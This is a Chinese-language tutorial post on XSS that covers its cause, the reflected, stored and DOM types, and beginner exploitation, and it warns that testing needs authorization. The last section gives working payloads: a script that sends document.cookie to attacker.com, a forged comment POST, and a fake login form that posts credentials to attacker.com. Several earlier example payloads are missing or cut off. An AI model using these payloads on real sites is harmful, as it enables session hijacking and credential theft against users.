XSS攻击基础全解析：类型、原理与入门级利用实战-程序员充电站

XSS攻击基础全解析：类型、原理与入门级利用实战

XSS（Cross-Site Scripting，跨站脚本攻击）是Web应用中最常见的漏洞之一，位列OWASP Top 10核心风险，其本质是攻击者将恶意JavaScript代码注入到目标页面中，通过浏览器执行代码实现窃取Cookie、伪造请求、篡改页面等攻击目的。相较于SQL注入、RCE等高危漏洞，XSS看似“危害较低”，但在实战中可串联其他漏洞形成攻击链，成为渗透测试与漏洞挖掘的重要突破口。

本文作为XSS攻击系列第一篇，从基础认知入手，拆解XSS核心原理、三大类型差异、入门级利用场景与Payload构造，帮新手建立XSS攻击的核心思维，掌握从漏洞识别到简单利用的全流程，为后续进阶绕过与高价值挖掘打下基础。

一、XSS攻击核心认知：先搞懂“为什么能成功”

核心原理

XSS攻击的核心是“输入未过滤+输出未编码”。Web应用若未对用户输入的内容进行严格校验与过滤，直接将其嵌入到页面HTML中，当其他用户访问该页面时，浏览器会将注入的恶意脚本当作合法代码执行，进而实现攻击者的预设目的。

关键前提：恶意脚本需被浏览器解析执行，因此注入点需处于HTML标签、脚本标签、事件属性等可执行上下文环境中，而非单纯的文本展示区域。

XSS与CSRF的区别（新手易混淆）

两者均为Web端常见攻击，但核心逻辑与利用方式完全不同，避免混淆：

XSS：聚焦“注入脚本”，利用目标网站的信任关系，在用户浏览器中执行恶意代码，主动窃取信息或伪造操作；
CSRF：聚焦“伪造请求”，利用用户的登录状态，诱导用户点击恶意链接，被动发起跨站请求，无需执行脚本。

合法边界：所有XSS测试需在授权靶场（如DVWA、OWASP WebGoat）、SRC平台或授权项目中进行，严禁未经授权注入恶意脚本，窃取他人信息或破坏页面，违反将承担法律责任。

二、XSS三大核心类型：差异、场景与识别方法

反射型XSS（非持久化XSS）：最易入门，一次性攻击

核心特征：恶意脚本通过URL参数、表单输入等方式提交，服务器未过滤直接反射回页面，仅在当前请求中生效，需诱导用户点击恶意URL才能触发，无持久化存储。

常见场景：搜索框、URL参数展示页、错误提示页（如输入错误账号密码后，页面回显输入内容）。

识别与利用实战：
识别方法：在输入点提交测试Payload（如），若页面弹出弹窗，且Payload出现在页面HTML源码中，说明存在反射型XSS；入门Payload：基础脚本弹窗（获取当前域名，避免跨域限制）；URL参数注入http://target.com/search?key=；局限性：需诱导用户点击恶意URL，攻击范围有限，易被浏览器XSS过滤器拦截。

存储型XSS（持久化XSS）：危害更大，批量攻击

核心特征：恶意脚本被提交后，服务器将其存储到数据库、评论区、用户资料等持久化载体中，任何访问该页面的用户都会触发脚本执行，无需诱导，攻击范围广、危害更强。

常见场景：论坛评论区、博客留言板、用户个人资料（昵称、签名）、聊天窗口。

识别与利用实战：
识别方法：在评论区、用户资料中提交测试Payload，提交成功后刷新页面，若弹窗触发，说明脚本被存储并回显执行；入门Payload：适配评论区的文本注入<img src=x（避免脚本标签被过滤，用图片错误事件触发）；核心危害：可批量窃取访问该页面用户的Cookie、伪造全站请求，甚至控制用户账号（如修改密码、发布恶意内容）。

DOM型XSS：基于前端解析，服务器无感知

核心特征：恶意脚本无需经过服务器处理，仅通过前端JavaScript操作DOM树实现注入，服务器仅作为静态资源载体，无法感知漏洞存在，挖掘难度高于前两种。

常见场景：前端路由跳转（如URL hash值解析）、页面元素动态渲染（如通过JS将URL参数赋值给页面标签）、本地存储（localStorage/sessionStorage）读取。

识别与利用实战：
识别方法：提交测试Payload后，查看页面源码无Payload，但弹窗触发，需通过浏览器开发者工具（Elements面板）查看DOM树变化，定位注入点；入门Payload：URL hash注入http://target.com/#（前端JS读取hash值并渲染）；DOM赋值注入 ``（若未过滤hash值，可注入恶意脚本）；局限性：依赖前端DOM操作逻辑，漏洞位置隐蔽，需具备前端代码分析能力。

三、XSS入门级利用场景：从“弹窗”到“实际攻击”

窃取Cookie：获取用户登录状态

核心目的：通过XSS脚本窃取用户Cookie，利用Cookie伪造登录，接管用户账号。

实战Payload（反射型/存储型通用）：

<script> // 将Cookie发送到攻击者服务器 var img = new Image(); img.src = "http://attacker.com/steal?cookie=" + document.cookie; </script>

补充说明：若Cookie设置了HttpOnly属性，JavaScript无法读取，可通过其他方式绕过（后续文章详解）。

伪造请求：执行未授权操作

核心目的：利用用户登录状态，通过XSS脚本伪造POST/GET请求，执行发表评论、修改资料等操作。

实战Payload（伪造评论发布）：

<script> // 构造POST请求，伪造发布评论 var xhr = new XMLHttpRequest(); xhr.open("POST", "http://target.com/api/comment", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("content=恶意推广内容&userId=123"); </script>

页面篡改：误导用户操作

核心目的：通过XSS脚本篡改页面内容，诱导用户输入账号密码、点击恶意链接。

实战Payload（篡改登录表单）：

<script> // 隐藏原登录表单，插入伪造表单 document.getElementById("login-form").style.display = "none"; var fakeForm = '<form action="http://attacker.com/stealAccount" method="post">' + '<input type="text" name="username" placeholder="用户名">' + '<input type="password" name="password" placeholder="密码">' + '<button type="submit">登录</button>' + '</form>'; document.body.innerHTML += fakeForm; </script>